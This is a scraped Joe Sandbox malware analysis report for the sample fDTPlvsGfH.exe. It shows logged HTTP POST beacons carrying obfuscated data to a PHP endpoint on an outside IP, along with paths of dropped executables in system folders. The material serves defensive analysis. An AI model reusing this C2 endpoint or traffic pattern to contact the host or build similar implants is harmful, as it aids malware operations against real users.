Apr 20, 2024 00:42:11.845197916 CEST	200	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 19 Apr 2024 22:42:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 52 5d 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;R]W0
Apr 20, 2024 00:42:11.855978966 CEST	234	OUT	POST /ExternalVm_CpuGameWindows.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 109.107.182.145 Content-Length: 384 Expect: 100-continue
Apr 20, 2024 00:42:12.117358923 CEST	25	IN	HTTP/1.1 100 Continue
Apr 20, 2024 00:42:12.173356056 CEST	384	OUT	Data Raw: 5f 53 5b 5e 51 5d 5d 53 5d 56 5a 59 52 5c 56 55 54 57 5c 59 50 51 53 59 57 5e 5e 5d 52 5b 5b 5b 42 52 57 5e 5f 57 5a 5b 59 5d 50 5c 50 5c 5f 5a 57 5d 58 40 59 58 56 51 59 52 50 53 5a 51 58 5c 5e 58 5c 59 5c 5d 50 51 46 59 43 56 59 59 42 5c 51 5d Data Ascii: _S[^Q]]S]VZYR\VUTW\YPQSYW^^]R[[[BRW^_WZ[Y]P\P\_ZW]X@YXVQYRPSZQX\^X\Y\]PQFYCVYYB\Q]QVSZYA^[\RYQ_RZ[BVQT\VX\Y]X^_R]]_R[Z\WZE\XSW]^U[VS_PZQZW^VUI]\VV\[W]YXZBB___S\BXFY^Y^ZU\Z_X_ZZ\\XVBU^R$',)D4"'##17Y4U(9(",-W#:+?84?#V,$.G#$Z-1
Apr 20, 2024 00:42:12.444468975 CEST	349	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 19 Apr 2024 22:42:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 09 1a 24 5f 2a 14 00 52 23 0c 3c 10 3b 2f 2b 0f 3e 32 36 5f 2e 21 29 1c 2a 3c 38 5b 2a 2d 3e 0b 3f 55 27 01 30 31 20 16 27 05 26 50 2c 3a 20 5a 01 11 27 43 33 5f 28 54 27 0d 0b 02 33 09 25 07 32 04 35 04 33 16 32 56 3d 3c 39 55 25 28 1a 11 28 2b 31 0f 2b 06 2f 43 25 02 2c 0c 20 34 20 50 0c 10 3b 0c 3d 0c 2f 51 24 3f 3c 0c 25 11 26 0a 37 07 27 0e 32 01 2f 50 36 34 2f 5e 28 0f 3a 14 28 03 30 59 35 0b 30 5a 24 0f 0a 53 28 08 22 5e 2c 0f 20 54 02 3d 5a 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98$_R#<;/+>26_.!)<8[*->?U'01 '&P,: Z'C3_(T'3%2532V=<9U%((+1+/C%, 4 P;=/Q$?<%&7'2/P64/^(:(0Y50Z$S("^, T=ZP0
Apr 20, 2024 00:42:12.454757929 CEST	235	OUT	POST /ExternalVm_CpuGameWindows.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 109.107.182.145 Content-Length: 2568 Expect: 100-continue
Apr 20, 2024 00:42:12.716178894 CEST	25	IN	HTTP/1.1 100 Continue
Apr 20, 2024 00:42:12.834356070 CEST	2568	OUT	Data Raw: 5a 57 5b 5f 54 5e 58 56 5d 56 5a 59 52 5c 56 5b 54 5c 5c 5a 50 50 53 5e 57 5e 5e 5d 52 5b 5b 5b 42 52 57 5e 5f 57 5a 5b 59 5d 50 5c 50 5c 5f 5a 57 5d 58 40 59 58 56 51 59 52 50 53 5a 51 58 5c 5e 58 5c 59 5c 5d 50 51 46 59 43 56 59 59 42 5c 51 5d Data Ascii: ZW[_T^XV]VZYR\V[T\\ZPPS^W^^]R[[[BRW^_WZ[Y]P\P\_ZW]X@YXVQYRPSZQX\^X\Y\]PQFYCVYYB\Q]QVSZYA^[\RYQ_RZ[BVQT\VX\Y]X^_R]]_R[Z\WZE\XSW]^U[VS_PZQZW^VUI]\VV\[W]YXZBB___S\BXFY^Y^ZU\Z_X_ZZ\\XVBU^R$3<"4:>3X18?] ; (\ "?-T#!&=; ,:.G#$Z-1
Apr 20, 2024 00:42:13.104340076 CEST	200	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 19 Apr 2024 22:42:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 52 5d 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;R]W0

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 00:42:12.172900915 CEST	235	OUT	POST /ExternalVm_CpuGameWindows.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 109.107.182.145 Content-Length: 1440 Expect: 100-continue
Apr 20, 2024 00:42:12.436400890 CEST	25	IN	HTTP/1.1 100 Continue
Apr 20, 2024 00:42:12.437046051 CEST	1440	OUT	Data Raw: 5f 50 5e 5d 54 5d 5d 51 5d 56 5a 59 52 5c 56 54 54 52 5c 59 50 5e 53 5a 57 5e 5e 5d 52 5b 5b 5b 42 52 57 5e 5f 57 5a 5b 59 5d 50 5c 50 5c 5f 5a 57 5d 58 40 59 58 56 51 59 52 50 53 5a 51 58 5c 5e 58 5c 59 5c 5d 50 51 46 59 43 56 59 59 42 5c 51 5d Data Ascii: _P^]T]]Q]VZYR\VTTR\YP^SZW^^]R[[[BRW^_WZ[Y]P\P\_ZW]X@YXVQYRPSZQX\^X\Y\]PQFYCVYYB\Q]QVSZYA^[\RYQ_RZ[BVQT\VX\Y]X^_R]]_R[Z\WZE\XSW]^U[VS_PZQZW^VUI]\VV\[W]YXZBB___S\BXFY^Y^ZU\Z_X_ZZ\\XVBU^R$Z&?=7=3#(_2+/X4^#W(#X!2 :V=+#'9$.G#$Z-1
Apr 20, 2024 00:42:12.706577063 CEST	349	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 19 Apr 2024 22:42:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 09 1a 27 02 3e 14 3a 55 20 21 20 59 2f 02 24 51 29 21 22 58 3a 0b 25 5a 2b 3f 0a 5d 29 2e 25 1a 2b 33 2b 06 26 32 2c 15 25 2f 36 55 39 3a 20 5a 01 11 24 18 27 2a 2c 53 25 33 36 5f 27 30 2e 5f 26 2d 04 15 24 3b 26 52 3d 3c 2a 0e 27 2b 3f 02 3e 16 0c 56 3c 59 23 43 26 02 2b 54 21 0e 20 50 0c 10 38 52 29 21 24 0e 31 2c 3c 09 26 3c 36 0b 20 2e 0a 50 26 06 2c 0e 22 0a 01 59 2b 08 2e 5f 3f 13 02 12 36 22 0a 5a 26 21 05 0f 2b 32 22 5e 2c 0f 20 54 02 3d 5a 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98'>:U ! Y/$Q)!"X:%Z+?]).%+3+&2,%/6U9: Z$',S%36_'0._&-$;&R=<'+?>V<Y#C&+T! P8R)!$1,<&<6 .P&,"Y+._?6"Z&!+2"^, T=ZP0

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 00:42:13.490075111 CEST	235	OUT	POST /ExternalVm_CpuGameWindows.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 109.107.182.145 Content-Length: 2568 Expect: 100-continue
Apr 20, 2024 00:42:13.748466015 CEST	25	IN	HTTP/1.1 100 Continue
Apr 20, 2024 00:42:13.748842001 CEST	2568	OUT	Data Raw: 5a 52 5e 53 51 5d 5d 51 5d 56 5a 59 52 5c 56 57 54 5d 5c 5f 50 57 53 5d 57 5e 5e 5d 52 5b 5b 5b 42 52 57 5e 5f 57 5a 5b 59 5d 50 5c 50 5c 5f 5a 57 5d 58 40 59 58 56 51 59 52 50 53 5a 51 58 5c 5e 58 5c 59 5c 5d 50 51 46 59 43 56 59 59 42 5c 51 5d Data Ascii: ZR^SQ]]Q]VZYR\VWT]\_PWS]W^^]R[[[BRW^_WZ[Y]P\P\_ZW]X@YXVQYRPSZQX\^X\Y\]PQFYCVYYB\Q]QVSZYA^[\RYQ_RZ[BVQT\VX\Y]X^_R]]_R[Z\WZE\XSW]^U[VS_PZQZW^VUI]\VV\[W]YXZBB___S\BXFY^Y^ZU\Z_X_ZZ\\XVBU^R'$ :)W$8_2+Y7(8+"#2*8 ,8:.G#$Z-1
Apr 20, 2024 00:42:14.015285015 CEST	200	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 19 Apr 2024 22:42:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 52 5d 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;R]W0

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 00:42:14.507934093 CEST	259	OUT	POST /ExternalVm_CpuGameWindows.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 109.107.182.145 Content-Length: 2568 Expect: 100-continue Connection: Keep-Alive
Apr 20, 2024 00:42:14.769402027 CEST	25	IN	HTTP/1.1 100 Continue
Apr 20, 2024 00:42:14.771763086 CEST	2568	OUT	Data Raw: 5f 54 5b 5c 54 59 5d 56 5d 56 5a 59 52 50 56 54 54 50 5c 59 50 51 53 5d 57 5e 5e 5d 52 5b 5b 5b 42 52 57 5e 5f 57 5a 5b 59 5d 50 5c 50 5c 5f 5a 57 5d 58 40 59 58 56 51 59 52 50 53 5a 51 58 5c 5e 58 5c 59 5c 5d 50 51 46 59 43 56 59 59 42 5c 51 5d Data Ascii: _T[\TY]V]VZYRPVTTP\YPQS]W^^]R[[[BRW^_WZ[Y]P\P\_ZW]X@YXVQYRPSZQX\^X\Y\]PQFYCVYYB\Q]QVSZYA^[\RYQ_RZ[BVQT\VX\Y]X^_R]]_R[Z\WZE\XSW]^U[VS_PZQZW^VUI]\VV\[W]YXZBB___S\BXFY^Y^ZU\Z_X_ZZ\\XVBU^R$Z$9E#5V&3'%,#8++:;X5=72&W*7U-.G#$Z-
Apr 20, 2024 00:42:15.039835930 CEST	200	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 19 Apr 2024 22:42:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 52 5d 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;R]W0

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 00:42:15.533597946 CEST	259	OUT	POST /ExternalVm_CpuGameWindows.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 109.107.182.145 Content-Length: 2568 Expect: 100-continue Connection: Keep-Alive
Apr 20, 2024 00:42:15.791995049 CEST	25	IN	HTTP/1.1 100 Continue
Apr 20, 2024 00:42:15.792200089 CEST	2568	OUT	Data Raw: 5f 53 5b 5b 51 5f 58 50 5d 56 5a 59 52 59 56 54 54 5d 5c 5f 50 55 53 52 57 5e 5e 5d 52 5b 5b 5b 42 52 57 5e 5f 57 5a 5b 59 5d 50 5c 50 5c 5f 5a 57 5d 58 40 59 58 56 51 59 52 50 53 5a 51 58 5c 5e 58 5c 59 5c 5d 50 51 46 59 43 56 59 59 42 5c 51 5d Data Ascii: _S[[Q_XP]VZYRYVTT]\_PUSRW^^]R[[[BRW^_WZ[Y]P\P\_ZW]X@YXVQYRPSZQX\^X\Y\]PQFYCVYYB\Q]QVSZYA^[\RYQ_RZ[BVQT\VX\Y]X^_R]]_R[Z\WZE\XSW]^U[VS_PZQZW^VUI]\VV\[W]YXZBB___S\BXFY^Y^ZU\Z_X_ZZ\\XVBU^R$X0?"49U' <&3X#8<*+\6%R#1+< ]!/;R-.G#$Z-%
Apr 20, 2024 00:42:16.058840990 CEST	200	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 19 Apr 2024 22:42:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 52 5d 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;R]W0

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 00:42:17.207940102 CEST	259	OUT	POST /ExternalVm_CpuGameWindows.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 109.107.182.145 Content-Length: 2568 Expect: 100-continue Connection: Keep-Alive
Apr 20, 2024 00:42:17.466619968 CEST	25	IN	HTTP/1.1 100 Continue
Apr 20, 2024 00:42:17.467660904 CEST	2568	OUT	Data Raw: 5f 55 5e 58 54 57 58 5e 5d 56 5a 59 52 59 56 5a 54 51 5c 5c 50 56 53 52 57 5e 5e 5d 52 5b 5b 5b 42 52 57 5e 5f 57 5a 5b 59 5d 50 5c 50 5c 5f 5a 57 5d 58 40 59 58 56 51 59 52 50 53 5a 51 58 5c 5e 58 5c 59 5c 5d 50 51 46 59 43 56 59 59 42 5c 51 5d Data Ascii: _U^XTWX^]VZYRYVZTQ\\PVSRW^^]R[[[BRW^_WZ[Y]P\P\_ZW]X@YXVQYRPSZQX\^X\Y\]PQFYCVYYB\Q]QVSZYA^[\RYQ_RZ[BVQT\VX\Y]X^_R]]_R[Z\WZE\XSW]^U[VS_PZQZW^VUI]\VV\[W]YXZBB___S\BXFY^Y^ZU\Z_X_ZZ\\XVBU^R$3 >3&(7_"(?T+*^5Z9W72&T>^ 7T94.G#$Z-%
Apr 20, 2024 00:42:17.734189034 CEST	200	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 19 Apr 2024 22:42:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 52 5d 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;R]W0

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 00:42:18.111947060 CEST	259	OUT	POST /ExternalVm_CpuGameWindows.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 109.107.182.145 Content-Length: 2144 Expect: 100-continue Connection: Keep-Alive
Apr 20, 2024 00:42:18.373658895 CEST	25	IN	HTTP/1.1 100 Continue
Apr 20, 2024 00:42:18.373832941 CEST	2144	OUT	Data Raw: 5a 56 5e 52 51 58 5d 51 5d 56 5a 59 52 5b 56 50 54 54 5c 59 50 57 53 59 57 5e 5e 5d 52 5b 5b 5b 42 52 57 5e 5f 57 5a 5b 59 5d 50 5c 50 5c 5f 5a 57 5d 58 40 59 58 56 51 59 52 50 53 5a 51 58 5c 5e 58 5c 59 5c 5d 50 51 46 59 43 56 59 59 42 5c 51 5d Data Ascii: ZV^RQX]Q]VZYR[VPTT\YPWSYW^^]R[[[BRW^_WZ[Y]P\P\_ZW]X@YXVQYRPSZQX\^X\Y\]PQFYCVYYB\Q]QVSZYA^[\RYQ_RZ[BVQT\VX\Y]X^_R]]_R[Z\WZE\XSW]^U[VS_PZQZW^VUI]\VV\[W]YXZBB___S\BXFY^Y^ZU\Z_X_ZZ\\XVBU^R$&,=4=3 ,^1;04;4(9+"#&T*?$ <;W:4.G#$Z--
Apr 20, 2024 00:42:18.641175985 CEST	349	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 19 Apr 2024 22:42:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 09 1a 24 1d 2a 03 32 1e 37 1c 3c 13 2f 3c 27 08 2a 1f 3e 58 2d 0c 36 07 2a 2c 28 5b 3e 3d 21 50 28 30 3b 01 27 54 24 5f 27 12 00 1d 3a 10 20 5a 01 11 24 19 24 29 20 52 30 33 08 5e 26 20 2e 11 31 3d 2e 5c 27 16 08 57 29 3f 29 53 27 2b 20 13 2a 28 36 51 3c 11 20 18 26 3c 3b 10 36 0e 20 50 0c 10 38 55 2a 0c 09 50 25 12 3b 1e 25 3f 04 0f 21 3d 24 57 27 2f 27 15 23 34 0e 04 2b 1f 26 5e 28 13 37 06 35 1c 2b 04 33 21 34 1e 3c 22 22 5e 2c 0f 20 54 02 3d 5a 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98$27</<'>X-6,([>=!P(0;'T$_': Z$$) R03^& .1=.\'W)?)S'+ (6Q< &<;6 P8U*P%;%?!=$W'/'#4+&^(75+3!4<""^, T=ZP0

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 00:42:19.241514921 CEST	259	OUT	POST /ExternalVm_CpuGameWindows.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 109.107.182.145 Content-Length: 2568 Expect: 100-continue Connection: Keep-Alive
Apr 20, 2024 00:42:19.500226021 CEST	25	IN	HTTP/1.1 100 Continue
Apr 20, 2024 00:42:19.500390053 CEST	2568	OUT	Data Raw: 5f 54 5e 5e 51 5c 58 51 5d 56 5a 59 52 59 56 50 54 51 5c 58 50 55 53 5a 57 5e 5e 5d 52 5b 5b 5b 42 52 57 5e 5f 57 5a 5b 59 5d 50 5c 50 5c 5f 5a 57 5d 58 40 59 58 56 51 59 52 50 53 5a 51 58 5c 5e 58 5c 59 5c 5d 50 51 46 59 43 56 59 59 42 5c 51 5d Data Ascii: _T^^Q\XQ]VZYRYVPTQ\XPUSZW^^]R[[[BRW^_WZ[Y]P\P\_ZW]X@YXVQYRPSZQX\^X\Y\]PQFYCVYYB\Q]QVSZYA^[\RYQ_RZ[BVQT\VX\Y]X^_R]]_R[Z\WZE\XSW]^U[VS_PZQZW^VUI]\VV\[W]YXZBB___S\BXFY^Y^ZU\Z_X_ZZ\\XVBU^R'$)@4)V37&0"+'):3Y"<)"1")04?W,4.G#$Z-%
Apr 20, 2024 00:42:19.771672964 CEST	200	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 19 Apr 2024 22:42:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 52 5d 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;R]W0

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 00:42:20.263535976 CEST	259	OUT	POST /ExternalVm_CpuGameWindows.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 109.107.182.145 Content-Length: 2568 Expect: 100-continue Connection: Keep-Alive
Apr 20, 2024 00:42:20.522178888 CEST	25	IN	HTTP/1.1 100 Continue
Apr 20, 2024 00:42:20.522360086 CEST	2568	OUT	Data Raw: 5a 55 5b 59 54 58 58 51 5d 56 5a 59 52 5b 56 53 54 52 5c 5d 50 5f 53 58 57 5e 5e 5d 52 5b 5b 5b 42 52 57 5e 5f 57 5a 5b 59 5d 50 5c 50 5c 5f 5a 57 5d 58 40 59 58 56 51 59 52 50 53 5a 51 58 5c 5e 58 5c 59 5c 5d 50 51 46 59 43 56 59 59 42 5c 51 5d Data Ascii: ZU[YTXXQ]VZYR[VSTR\]P_SXW^^]R[[[BRW^_WZ[Y]P\P\_ZW]X@YXVQYRPSZQX\^X\Y\]PQFYCVYYB\Q]QVSZYA^[\RYQ_RZ[BVQT\VX\Y]X^_R]]_R[Z\WZE\XSW]^U[VS_PZQZW^VUI]\VV\[W]YXZBB___S\BXFY^Y^ZU\Z_X_ZZ\\XVBU^R$Z'/=A4_$/10#^(+3Y#< !? _4?:.G#$Z--
Apr 20, 2024 00:42:20.788465023 CEST	200	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 19 Apr 2024 22:42:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 52 5d 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;R]W0

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 00:42:21.517446041 CEST	259	OUT	POST /ExternalVm_CpuGameWindows.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 109.107.182.145 Content-Length: 2568 Expect: 100-continue Connection: Keep-Alive
Apr 20, 2024 00:42:21.779643059 CEST	25	IN	HTTP/1.1 100 Continue
Apr 20, 2024 00:42:21.779851913 CEST	2568	OUT	Data Raw: 5f 56 5b 5c 51 5d 58 53 5d 56 5a 59 52 50 56 51 54 51 5c 5b 50 51 53 58 57 5e 5e 5d 52 5b 5b 5b 42 52 57 5e 5f 57 5a 5b 59 5d 50 5c 50 5c 5f 5a 57 5d 58 40 59 58 56 51 59 52 50 53 5a 51 58 5c 5e 58 5c 59 5c 5d 50 51 46 59 43 56 59 59 42 5c 51 5d Data Ascii: _V[\Q]XS]VZYRPVQTQ\[PQSXW^^]R[[[BRW^_WZ[Y]P\P\_ZW]X@YXVQYRPSZQX\^X\Y\]PQFYCVYYB\Q]QVSZYA^[\RYQ_RZ[BVQT\VX\Y]X^_R]]_R[Z\WZE\XSW]^U[VS_PZQZW^VUI]\VV\[W]YXZBB___S\BXFY^Y^ZU\Z_X_ZZ\\XVBU^R$0<!@ !R& ,%+, ;'T<)8#,%"2-+/Z#?',$.G#$Z-
Apr 20, 2024 00:42:22.047909975 CEST	200	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 19 Apr 2024 22:42:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 52 5d 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;R]W0

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 00:42:23.925194025 CEST	259	OUT	POST /ExternalVm_CpuGameWindows.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 109.107.182.145 Content-Length: 2144 Expect: 100-continue Connection: Keep-Alive
Apr 20, 2024 00:42:24.187011003 CEST	25	IN	HTTP/1.1 100 Continue
Apr 20, 2024 00:42:24.187284946 CEST	2144	OUT	Data Raw: 5a 52 5e 58 54 5d 58 56 5d 56 5a 59 52 5d 56 53 54 56 5c 53 50 56 53 5d 57 5e 5e 5d 52 5b 5b 5b 42 52 57 5e 5f 57 5a 5b 59 5d 50 5c 50 5c 5f 5a 57 5d 58 40 59 58 56 51 59 52 50 53 5a 51 58 5c 5e 58 5c 59 5c 5d 50 51 46 59 43 56 59 59 42 5c 51 5d Data Ascii: ZR^XT]XV]VZYR]VSTV\SPVS]W^^]R[[[BRW^_WZ[Y]P\P\_ZW]X@YXVQYRPSZQX\^X\Y\]PQFYCVYYB\Q]QVSZYA^[\RYQ_RZ[BVQT\VX\Y]X^_R]]_R[Z\WZE\XSW]^U[VS_PZQZW^VUI]\VV\[W]YXZBB___S\BXFY^Y^ZU\Z_X_ZZ\\XVBU^R$Y09"5R'8Y24#^<()'",&#18[74..G#$Z-5
Apr 20, 2024 00:42:24.459186077 CEST	349	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 19 Apr 2024 22:42:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 09 1a 24 59 29 3a 26 54 34 0c 24 10 2f 3c 3c 50 2a 31 36 1c 2e 1c 3a 02 2a 06 3b 03 2a 3e 39 51 3c 0a 34 5b 24 32 02 5f 27 12 36 50 2e 10 20 5a 01 11 27 09 30 00 3f 0b 33 55 2a 5b 33 20 08 5a 25 2d 3a 16 25 28 25 0a 3e 2c 21 52 30 01 23 03 2a 16 36 51 3f 01 0d 41 32 02 33 1d 21 34 20 50 0c 10 3b 0a 29 21 3f 50 32 5a 33 55 25 2f 0b 55 37 3d 38 57 25 2f 0d 1b 36 1d 3b 59 28 57 3a 16 3c 3e 33 07 36 0c 27 02 33 08 38 11 28 22 22 5e 2c 0f 20 54 02 3d 5a 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98$Y):&T4$/<<P16.:;>9Q<4[$2_'6P. Z'0?3U[3 Z%-:%(%>,!R0#*6Q?A23!4 P;)!?P2Z3U%/U7=8W%/6;Y(W:<>36'38(""^, T=ZP0

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report fDTPlvsGfH.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\ebcca32ff60686

C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe

C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe:Zone.Identifier

C:\Program Files\Windows Portable Devices\ebcca32ff60686

C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe

C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe:Zone.Identifier

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\Recovery\ebcca32ff60686

C:\Recovery\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe

Windows Analysis Report
fDTPlvsGfH.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 00:42:27.643850088 CEST	259	OUT	POST /ExternalVm_CpuGameWindows.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 109.107.182.145 Content-Length: 2568 Expect: 100-continue Connection: Keep-Alive
Apr 20, 2024 00:42:27.902728081 CEST	25	IN	HTTP/1.1 100 Continue
Apr 20, 2024 00:42:27.902925968 CEST	2568	OUT	Data Raw: 5a 50 5b 59 54 5c 5d 54 5d 56 5a 59 52 5a 56 5a 54 57 5c 5d 50 5f 53 58 57 5e 5e 5d 52 5b 5b 5b 42 52 57 5e 5f 57 5a 5b 59 5d 50 5c 50 5c 5f 5a 57 5d 58 40 59 58 56 51 59 52 50 53 5a 51 58 5c 5e 58 5c 59 5c 5d 50 51 46 59 43 56 59 59 42 5c 51 5d Data Ascii: ZP[YT\]T]VZYRZVZTW\]P_SXW^^]R[[[BRW^_WZ[Y]P\P\_ZW]X@YXVQYRPSZQX\^X\Y\]PQFYCVYYB\Q]QVSZYA^[\RYQ_RZ[BVQT\VX\Y]X^_R]]_R[Z\WZE\XSW]^U[VS_PZQZW^VUI]\VV\[W]YXZBB___S\BXFY^Y^ZU\Z_X_ZZ\\XVBU^R$X'<" *&0'& #+')9'!>41),<]#, -.G#$Z-)
Apr 20, 2024 00:42:28.168226004 CEST	200	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 19 Apr 2024 22:42:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 52 5d 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;R]W0

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 00:42:30.410389900 CEST	259	OUT	POST /ExternalVm_CpuGameWindows.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 109.107.182.145 Content-Length: 2568 Expect: 100-continue Connection: Keep-Alive
Apr 20, 2024 00:42:30.668905020 CEST	25	IN	HTTP/1.1 100 Continue

Timestamp	Bytes transferred	Direction	Data
